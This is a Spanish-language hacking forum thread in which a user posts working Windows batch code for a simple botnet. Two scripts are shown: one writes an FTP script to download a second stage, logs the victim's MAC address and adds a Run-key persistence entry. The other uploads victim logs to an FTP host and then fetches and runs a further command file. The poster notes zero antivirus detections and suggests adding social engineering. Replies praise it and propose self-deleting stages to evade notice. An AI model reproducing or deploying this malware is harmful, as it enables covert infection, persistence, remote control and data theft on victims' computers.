Botnet sencila [Batch]

Iniciado por rollth, Agosto 15, 2015, 11:10:46 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 15, 2015, 11:10:46 AM
Buenas a todos, vengo a traeros una botnet sencilla 'programada' entera con batch.

Son varios archivos, el primer archivo va a ser este, que lo que hace es descargarse el Fecha.bat (Encargado de contar los pcs y ejecutar el 3º archivo que será el que dé las ordenes definitivas). A este archivo se lo pueden añadir cosas como ingeniería social para engañar a alguien.

Código: dos
@echo off

cd C:\Users\%username%

set ruta=%CD%

rem Prepara el archivo que controla las máquinas infectadas.

set numero=%random%

echo %numero% > numero.txt

getmac > %numero%

del ftp.txt
echo open host >> ftp.txt
echo userdown >> ftp.txt
echo passdown >> ftp.txt
echo get Fecha.bat >> ftp.txt
echo quit >> ftp.txt

start /min ftp -s:ftp.txt

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v winReg32 /t REG_SZ /d %ruta%\Fecha.bat


SHA256: 14b4db4fcb1778e4ee709d200b1b60db91e5dde5062ca3abcab66233eaa35907 
Nombre: Malware.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 13:53:25 UTC ( hace 1 minuto ) 

El Segundo archivo sería el que se encarga de descargar e iniciar un tercer archivo que se ejecutaría, además contabiliza los pcs infectados.

Código: dos
@echo off

rem Crea un txt con la fecha y hora actual.

rem Lee el número del archivo numero.txt

for /f "tokens=*" %%x in (numero.txt) do (
set nombre=%%x
goto escribir
) 

:escribir

rem Escribe el archivo

echo ----------------- >> %nombre%
echo fecha: %date% >> %nombre%
echo hora: %time% >> %nombre%

rem Envía el archivo.

del ftp.txt
del ftp1.txt
echo open host >> ftp.txt
echo userfecha>> ftp.txt
echo passfecha>> ftp.txt
echo put %nombre% >> ftp.txt
echo quit >> ftp.txt

start /min ftp -s:ftp.txt

rem Ejecuta el archivo que he subido

echo open host >> ftp1.txt
echo userdown>> ftp1.txt
echo passdown>> ftp1.txt
echo get eject.bat >> ftp1.txt
echo quit >> ftp1.txt

start /min ftp -s:ftp1.txt

timeout /t 15

start eject.bat


SHA256: 62b766ad33d7bea8959d463b44909b0d37ba61963cd8ad1e32f57e4547954456 
Nombre: Fecha.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 14:04:47 UTC ( hace 0 minutos ) 

Los timeout los pongo porque el host que utilizo es lento,

En cuanto a las cuentas ftp hice dos y dos carpetas diferentes, una carpeta para las descargas, que solo pueda descargar, para eject.bat y fecha.bat y otra carpeta llamada Infectados con otra cuenta que solo puede subir archivos.

Acepto ideas y criticas

!Saludos¡
RollthBuen hacker mejor You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Agosto 15, 2015, 04:51:01 PM #1
Nada mal @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, doy por hecho que lo has programado tu no?

Saludos.


Agosto 15, 2015, 05:35:05 PM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nada mal @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, doy por hecho que lo has programado tu no?

Saludos.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login si, lo he programado yo, es sencillo pero puede servir.

RollthBuen hacker mejor You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Agosto 15, 2015, 08:14:24 PM #3
Me encanta la idea y el programa! :D
No te estas dando cuenta pero de a poco vas programando modularmente un buen y completo troyano
Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Igm: /secureart
Telegram: @roaddhdc
Correo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Agosto 15, 2015, 11:33:50 PM #4
muy bueno ROLLTH.
Como sugerencias e ideas, como tu mismo dijiste que aceptabas, se me ocurre
que un solo batch genere al resto de los demás batch, y así mismo los valla borrando junto con los logs que envía luego de haberlos enviado
de esa forma seria mas fácil la infección y menos sospechoso que quedaran logs sueltos :)
El arte de crear malware, es algo que solo pocos entienden!

Agosto 16, 2015, 05:17:49 AM #5
Muchas gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...
RollthBuen hacker mejor You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Agosto 16, 2015, 05:21:39 AM #6
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muchas gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

claro, que un solo batch valla generando el resto.
y a medida que cada batch secundario termine de ejecutarse se elimine.
así evitarías problemas.
El arte de crear malware, es algo que solo pocos entienden!

Imprimir
Ir Arriba Páginas1
Acciones del Usuario